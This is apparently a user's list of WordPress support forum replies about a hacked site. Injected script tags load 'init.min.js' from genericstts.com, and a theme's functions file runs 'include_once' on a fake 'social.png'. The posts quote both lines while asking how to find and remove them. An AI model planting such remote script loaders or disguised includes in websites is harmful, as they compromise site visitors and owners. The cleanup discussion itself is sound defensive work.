delraycomputers
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: problem with http://genericstts.com/init.min.jsGreat, i removed the social.png now and google developer tools cannot find it anymore.. GREAT!
Forum: Fixing WordPress
In reply to: problem with http://genericstts.com/init.min.jsMree,i also see in functions under my theme the followng code:
if (!defined(‘WP_OPTION_KEY’)) {
include_once ‘social.png’;so what do you need us to do with that, change it to social.php, or delete it like on this link: http://stackoverflow.com/questions/23318954/wordpress-hacking-via-false-png-images ?
And then what happens?
Forum: Fixing WordPress
In reply to: problem with http://genericstts.com/init.min.jsYabgu, header.php under your theme?
Forum: Fixing WordPress
In reply to: problem with http://genericstts.com/init.min.jsI find/found the quote in my index page pagesource.
<script src=”//genericstts.com/init.min.js”/></script><script type=”text/javascript”>I tried to find it in functions, header, index, plugins, .. couldn’t find using fileseek.
I just checked on my other computer, and i couldn’t see the code when opening the website.
Now i open it again, and boom, the code is there<script src=”//genericstts.com/init.min.js”/></script><script type=”text/javascript”>
Forum: Fixing WordPress
In reply to: problem with http://genericstts.com/init.min.jsHello people!
yes, one of our websites also has the same problem.
http://www.drentertainment.com
Any idea where i can find that string i can remove?